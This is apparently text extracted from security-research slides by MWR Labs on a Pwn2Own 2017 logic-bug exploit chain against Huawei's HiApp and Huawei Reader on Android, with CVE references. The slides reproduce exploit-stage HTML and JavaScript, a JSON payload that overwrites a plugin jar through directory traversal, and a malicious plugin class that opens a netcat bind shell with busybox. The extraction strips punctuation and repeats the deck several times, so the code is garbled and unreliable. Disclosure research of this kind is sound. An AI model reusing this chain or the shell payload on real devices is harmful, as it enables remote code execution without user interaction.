String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
About us
bull James Loureiro (NerdKernel) ndash Head of Security Research MWR primarily
focused on VR and reverse engineering (as well as herding other researchers)
bull Alex Plaskett (alexjplaskett) ndash Offensive security researcher MWR
primarily doing VR (WP7 jailbreak Pwn2Own Safari 2018 mobile security)
3
Background
bull How hard can it be
4
PWN2OWN 2017
5
Huawei Mate 9 Pro
6
PWN2OWN
Execute arbitrary instructionshellip
hellipretrieve sensitive informationhellip
hellipa full sandbox escape is requiredhellip
hellipwithout any user interaction
8
Pwn2Own Categories and Choice
9
PWN2OWN ndash Results
10
PUBLIC
Bug Hunting Approach
Browser attack surface
12
Exploit Mitigation Advancement
bull Memory Safety Mitigations
ndash ASLR PIE RELTO PartitionAlloc
bull Means you need mitigation bypass vulnerabilities too
bull Time consuming debugging memory corruption exploits on a real device
13
Attackers - Positives of Logic Bug Chains
bull Often design issues
ndash Hard to fix (long bug lives)
ndash Increased reliability
bull Architectural agnostic
ndash No problems with shellcode
bull Android IPC specifically is complex as hell
bull Harder to detect
14
Attackers - Negatives of Logic Bug Chains
bull They can get ridiculously long (11 Bugs in S8)
ndash One bug gets fixed and the whole chain is screwed
ndash Usually not particularly stealthy
Samsung phone rebooted
Huawei phone switches apps twice
bull Often requires a deeper understanding of the application
bull Automated detection is harder ndash how do you fuzz for logic bugs
15
Bug Hunting Tips
bull How too prioritise
ndash External Attack Surface (Reachable from browser)
ndash Permissions
Less of an issue for initial foothold
ndash Dangerous words
16
bull Want to rapidly find high risk issues in a large amount of apps
PUBLIC
Tooling and Automation
Toolset (Static vs Dynamic)
bull Android What do we care about
ndash BROWSABLE intents (Need to be web accessible) and Intents
ndash Content we can load into the applications (either via a WebView or Media)
ndash Controlled file writes reads
ndash Unsafe class loading
18
Increasing the attack surface
How do we get more things accessible
bull Intent Proxy Bugs
bull MITM stuff (SSL weaknesses)
19
Intent Proxy Example
bull Android Vendingbull LaunchUrlHandlerActivity
bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)
Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)
hellipif((v5) ampamp (v12))
v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1
hellip
Toolset (Static Analysis)
bull Rezord (internal) ndash Mass de-compilation of all apps
bull JEB
bull Grep
21
lsquoJandroidrsquo ndash Static analysis
22
lsquoJandroidrsquo ndash Static analysis
23
lsquoJandroidrsquo ndash Static analysis
bull For more info see Chainspotting Building Exploit Chains with Logic Bugs
slides
httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20
-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf
24
Dynamic Analysis Toolset
Global Hook Flexible Requires Root Lightweight
Xposed
Frida
bull Xposedbull Early injection (Zygote)
bull Global hooks across multiple applications
bull Fridabull Quick and easy prototyping
bull Debugging and dynamic analysis of obfuscated code
PUBLIC
Vulnerabilities
Building an Exploit Chain
bull So what do we need to dobull Assuming no memory corruption
bull BROWSABLE Intent URI handler etc
Browse to Website on
Device
Code Exec and Profit
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
Background
bull How hard can it be
4
PWN2OWN 2017
5
Huawei Mate 9 Pro
6
PWN2OWN
Execute arbitrary instructionshellip
hellipretrieve sensitive informationhellip
hellipa full sandbox escape is requiredhellip
hellipwithout any user interaction
8
Pwn2Own Categories and Choice
9
PWN2OWN ndash Results
10
PUBLIC
Bug Hunting Approach
Browser attack surface
12
Exploit Mitigation Advancement
bull Memory Safety Mitigations
ndash ASLR PIE RELTO PartitionAlloc
bull Means you need mitigation bypass vulnerabilities too
bull Time consuming debugging memory corruption exploits on a real device
13
Attackers - Positives of Logic Bug Chains
bull Often design issues
ndash Hard to fix (long bug lives)
ndash Increased reliability
bull Architectural agnostic
ndash No problems with shellcode
bull Android IPC specifically is complex as hell
bull Harder to detect
14
Attackers - Negatives of Logic Bug Chains
bull They can get ridiculously long (11 Bugs in S8)
ndash One bug gets fixed and the whole chain is screwed
ndash Usually not particularly stealthy
Samsung phone rebooted
Huawei phone switches apps twice
bull Often requires a deeper understanding of the application
bull Automated detection is harder ndash how do you fuzz for logic bugs
15
Bug Hunting Tips
bull How too prioritise
ndash External Attack Surface (Reachable from browser)
ndash Permissions
Less of an issue for initial foothold
ndash Dangerous words
16
bull Want to rapidly find high risk issues in a large amount of apps
PUBLIC
Tooling and Automation
Toolset (Static vs Dynamic)
bull Android What do we care about
ndash BROWSABLE intents (Need to be web accessible) and Intents
ndash Content we can load into the applications (either via a WebView or Media)
ndash Controlled file writes reads
ndash Unsafe class loading
18
Increasing the attack surface
How do we get more things accessible
bull Intent Proxy Bugs
bull MITM stuff (SSL weaknesses)
19
Intent Proxy Example
bull Android Vendingbull LaunchUrlHandlerActivity
bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)
Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)
hellipif((v5) ampamp (v12))
v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1
hellip
Toolset (Static Analysis)
bull Rezord (internal) ndash Mass de-compilation of all apps
bull JEB
bull Grep
21
lsquoJandroidrsquo ndash Static analysis
22
lsquoJandroidrsquo ndash Static analysis
23
lsquoJandroidrsquo ndash Static analysis
bull For more info see Chainspotting Building Exploit Chains with Logic Bugs
slides
httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20
-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf
24
Dynamic Analysis Toolset
Global Hook Flexible Requires Root Lightweight
Xposed
Frida
bull Xposedbull Early injection (Zygote)
bull Global hooks across multiple applications
bull Fridabull Quick and easy prototyping
bull Debugging and dynamic analysis of obfuscated code
PUBLIC
Vulnerabilities
Building an Exploit Chain
bull So what do we need to dobull Assuming no memory corruption
bull BROWSABLE Intent URI handler etc
Browse to Website on
Device
Code Exec and Profit
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
PWN2OWN 2017
5
Huawei Mate 9 Pro
6
PWN2OWN
Execute arbitrary instructionshellip
hellipretrieve sensitive informationhellip
hellipa full sandbox escape is requiredhellip
hellipwithout any user interaction
8
Pwn2Own Categories and Choice
9
PWN2OWN ndash Results
10
PUBLIC
Bug Hunting Approach
Browser attack surface
12
Exploit Mitigation Advancement
bull Memory Safety Mitigations
ndash ASLR PIE RELTO PartitionAlloc
bull Means you need mitigation bypass vulnerabilities too
bull Time consuming debugging memory corruption exploits on a real device
13
Attackers - Positives of Logic Bug Chains
bull Often design issues
ndash Hard to fix (long bug lives)
ndash Increased reliability
bull Architectural agnostic
ndash No problems with shellcode
bull Android IPC specifically is complex as hell
bull Harder to detect
14
Attackers - Negatives of Logic Bug Chains
bull They can get ridiculously long (11 Bugs in S8)
ndash One bug gets fixed and the whole chain is screwed
ndash Usually not particularly stealthy
Samsung phone rebooted
Huawei phone switches apps twice
bull Often requires a deeper understanding of the application
bull Automated detection is harder ndash how do you fuzz for logic bugs
15
Bug Hunting Tips
bull How too prioritise
ndash External Attack Surface (Reachable from browser)
ndash Permissions
Less of an issue for initial foothold
ndash Dangerous words
16
bull Want to rapidly find high risk issues in a large amount of apps
PUBLIC
Tooling and Automation
Toolset (Static vs Dynamic)
bull Android What do we care about
ndash BROWSABLE intents (Need to be web accessible) and Intents
ndash Content we can load into the applications (either via a WebView or Media)
ndash Controlled file writes reads
ndash Unsafe class loading
18
Increasing the attack surface
How do we get more things accessible
bull Intent Proxy Bugs
bull MITM stuff (SSL weaknesses)
19
Intent Proxy Example
bull Android Vendingbull LaunchUrlHandlerActivity
bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)
Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)
hellipif((v5) ampamp (v12))
v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1
hellip
Toolset (Static Analysis)
bull Rezord (internal) ndash Mass de-compilation of all apps
bull JEB
bull Grep
21
lsquoJandroidrsquo ndash Static analysis
22
lsquoJandroidrsquo ndash Static analysis
23
lsquoJandroidrsquo ndash Static analysis
bull For more info see Chainspotting Building Exploit Chains with Logic Bugs
slides
httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20
-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf
24
Dynamic Analysis Toolset
Global Hook Flexible Requires Root Lightweight
Xposed
Frida
bull Xposedbull Early injection (Zygote)
bull Global hooks across multiple applications
bull Fridabull Quick and easy prototyping
bull Debugging and dynamic analysis of obfuscated code
PUBLIC
Vulnerabilities
Building an Exploit Chain
bull So what do we need to dobull Assuming no memory corruption
bull BROWSABLE Intent URI handler etc
Browse to Website on
Device
Code Exec and Profit
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
